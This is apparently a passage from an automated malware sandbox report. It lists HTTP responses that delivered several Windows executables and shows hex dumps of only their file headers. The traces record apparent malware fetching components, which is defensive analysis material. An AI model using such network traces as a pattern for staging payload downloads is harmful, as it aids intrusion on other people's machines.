40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:08 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:09:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:11 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:12 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:13 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:16 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:17 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
